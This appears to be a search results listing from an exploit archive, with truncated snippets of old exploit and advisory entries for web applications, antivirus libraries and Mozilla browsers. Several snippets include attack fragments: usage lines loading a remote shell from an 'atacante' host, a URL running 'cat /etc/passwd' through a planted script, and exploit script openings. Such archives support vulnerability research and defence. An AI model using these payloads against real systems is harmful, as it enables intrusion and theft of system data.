1375 matches found
Claroline e-Learning 1.75 (ldap.inc.php) Remote File Inclusion Exploit
No description provided by source. #!/usr/bin/perl Claroline Open Source e-Learning 1.7.5 Remote File Include Exploit & Advisorie: beford xbefordx gmail com usage: perl own.pl host cmd-shell-url cmd-var perl own.pl http://host.com/claroline/auth/ http://atacante/shell.gif cmd cmd shell example: ?...
Dokeos LMS <= 1.6.4 (authldap.php) Remote File Include Exploit
Exploit for unknown platform in category web applications ============================================================== Dokeos LMS usage: perl own.pl perl own.pl http://host.com/dokeos/ http://atacante/shell.gif cmd cmd shell example: cmd variable: cmd; Description Vendor: http://www.dokeos.com/ T...
fastclicklite113.txt
Fast Click SQL Lite ----------- Fix : Contact the Vendor =========================================================== Aria Security Research Http://www.aria-security.net...
CoolMenus 4.0 - 'index.php' Remote File Inclusion
source: https://www.securityfocus.com/bid/17738/info CoolMenus is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker can exploit this issue to include an arbitrary remote file containing malicious P...
phpWebSite 0.10.2 - hub_dir Remote Command Execution
phpWebSite 0.10.2 - hub_dir Remote Command Execution #!/usr/bin/php -q -d short_open_tag=on arbitrary local inclusion, works with magic_quotes_gpc = Off\r\n"; echo "by rgod, mail: [email protected]\r\n"; echo "site: http://retrogod.altervista.org\r\n\r\n"; if $argc 0 include$hub_dir . 'conf/config.php'...
phpWebSite <= 0.10.2 (hub_dir) Remote Commands Execution Exploit
Exploit for unknown platform in category web applications ================================================================ phpWebSite arbitrary local inclusion, works with magic_quotes_gpc = Off\r\n"; echo "by rgod, mail: email protected\r\n"; echo "site: http://retrogod.altervista.org\r\n\r\n"; if...
phpWebSite <= 0.10.2 (hub_dir) Remote Commands Execution Exploit
No description provided by source. #!/usr/bin/php -q -d short_open_tag=on ? echo "PHPWebSite = 0.10.2 remote cmmnds xctn\r\n"; echo "- arbitrary local inclusion, works with magic_quotes_gpc = Off\r\n"; echo "by rgod, mail: [email protected]\r\n"; echo "site: http://retrogod.altervista.org\r\n\r\n"; i...
[Overflow.pl] Clam AntiVirus Win32-UPX Heap Overflow (not default configuration)
Overflow.pl Security Advisory 5 Clam AntiVirus Win32-UPX Heap Overflow not default configuration Vendor: Clam AntiVirus Affected version: Prior to 0.88.1 Vendor status: Fixed version released 0.88.1 Author: Damian Put [email protected] URL: http://www.overflow.pl/adv/clamavupxinteger.txt Date:...
phpkit_161r2_incl_xpl.txt
---------- PHPKit = v.1.6.1 release 2 remote code execution ------------------- software: site: www.phpkit.de description: a Content Management / homepage / community building software written in PHP language --------------------------------------------------------------------------------...
DocMGR <= 0.54.2 arbitrary remote inclusion
--------------- DocMGR = 0.54.2 arbitrary remote inclusion -------------------- software: site: http://www.docmgr.org/ description: "DocMGR is a complete, web-based Document Management System DMS. It allows for the storage of any file type, and supports full-text indexing of the most popular...
EGS Enterprise Groupware System 1.0 rc4 remote commands execution & FlySpray 0.9.7 remote commands execution
--------EGS Enterprise Groupware System 1.0 rc4 possibly prior versions------- remote code execution -------------------------------------------------------------------------------- software: site: http://egs.sourceforge.net/ description: "EGS is an Open Source business system released under the...
linpha_10_local.txt
------------- Linpha = 1.0 multiple arbitrary local inclusion ----------------- software: site: http://linpha.sourceforge.net/nuke/ description: " LinPHA is an easy to use, multilingual, flexible photo / image archive / album / gallery written in PHP. It uses a SQL database to store information...
[Full-disclosure] Symantec Antivirus Library Remote Heap Overflows
Date December 20, 2005 Vulnerability The Symantec Antivirus Library provides file format support for virus analysis. During decompression of RAR files Symantec is vulnerable to multiple heap overflows allowing attackers complete control of the systems being protected. These vulnerabilities can be...
sugar_suite_40beta.txt
SugarSuite Open Source "; fclose$fp; ? note: the file can have any extension, but not .php or any executable, it must be readable from a browser... now you can launch commands on target system: http://target/pathtosugar/suntzu.php?cmd=cat%20/etc/passwd this is my proof of concept exploit tool: ?p...
SimpleBBS <= v1.1 remote commands execution in c by: unitedasia security crew
SugarSuite Open Source = 4.0beta Remote code execution software: site: http://www.sugarcrm.com/crm/ i vulnerable code in acceptDecline.php at lines 81-82 ... $bean = $beanList[$_REQUEST['module']]; require_once($beanFiles[$bean]); ... if register_globals on & allow_url_fopen on in php.ini, remote code...
SugarSuite Open Source <= 4.0beta Remote code execution
SugarSuite Open Source = 4.0beta Remote code execution software: site: http://www.sugarcrm.com/crm/ i vulnerable code in acceptDecline.php at lines 81-82 ... $bean = $beanList[$_REQUEST['module']]; require_once($beanFiles[$bean]); ... if register_globals on & allow_url_fopen on in php.ini, remote code...
atutor151pl2.txt
ATutor 1.5.1pl2 SQL Injection / Remote commands execution software: site: http://www.atutor.ca/ description : "ATutor is an Open Source Web-based Learning Content Management System LCMS designed with accessibility and adaptability in mind." if magic_quotes_gpc off - SQL INJECTION vulnerable code in...
wagora420_xpl.txt
W-agora 4.2.0 Remote code execution / cross site scripting poc exploit software: site: http://w-agora.net/en/index.php description: "W-Agora is a web publishing and forum software. It allows you and your visitors to store and display messages, files, share discussions and other information on you...
mylittle15_16b.txt
My Little Forum 1.5 / 1.6beta SQL Injection software: site: http://www.mylittlehomepage.net/mylittleforum software: "A simple web-forum that supports classical thread view message tree as well as messageboard view to display the messages. Requires PHP 4.1 and a MySQL database." 1 look at the...
Mozilla Browsers 0xAD (HOST:) Remote Heap Buffer Overrun Exploit (v2)
No description provided by source. HTMLSCRIPT / SSSSSSS, SSSSSSS' PwnZilla 5 - One sploit fits all. FireFox optimized iSY iS; .sS Exploit for IDN host name heap buffer overrun in .SSSSSSS .sS Mozilla browsers FireFox, Mozilla and Netscape iS; .sS Copyright C 2003-2005 by Berend-Jan Wever. .SS...